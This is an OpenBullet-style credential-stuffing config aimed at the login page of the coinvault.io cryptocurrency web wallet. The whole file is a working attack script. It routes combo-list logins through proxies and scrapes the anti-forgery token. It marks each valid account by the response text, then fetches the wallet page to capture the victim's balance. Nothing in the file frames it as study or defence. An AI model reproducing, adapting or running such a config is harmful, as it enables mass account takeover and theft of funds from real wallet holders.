[SETTINGS]
{
  "Name": "Coinvault",
  "SuggestedBots": 10,
  "LastModified": "2018-06-29T15:11:12.1010837+00:00",
  "AdditionalInfo": "",
  "Author": "Mew",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "UserPass",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#GET_LOGIN_PAGE REQUEST GET "https://www.coinvault.io/Account/Login" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
#PARSE___REQUESTVERIFICATIONTOKEN PARSE "<SOURCE>" CSS "[name=__RequestVerificationToken]" "value" 0 -> VAR "__REQUESTVERIFICATIONTOKEN" "" "" 
#POST_LOGIN REQUEST POST "https://www.coinvault.io/Account/Login" AutoRedirect=TRUE 
  CONTENT "RememberMe=false&Email=<USER>&Password=<PASS>&__RequestVerificationToken=<__REQUESTVERIFICATIONTOKEN>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
KEYCHECK BanOn4XX=TRUE BanOnToCheck=TRUE 
  KEYCHAIN Success OR 
    KEY "Web wallet for" 
  KEYCHAIN Failure OR 
    KEY "Invalid username or password." 
REQUEST GET "https://www.coinvault.io/wallet/Wallet" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
PARSE "<SOURCE>" LR "class=\"balancetop\">" " <" Recursive=FALSE -> CAP "Balance" "" "" 
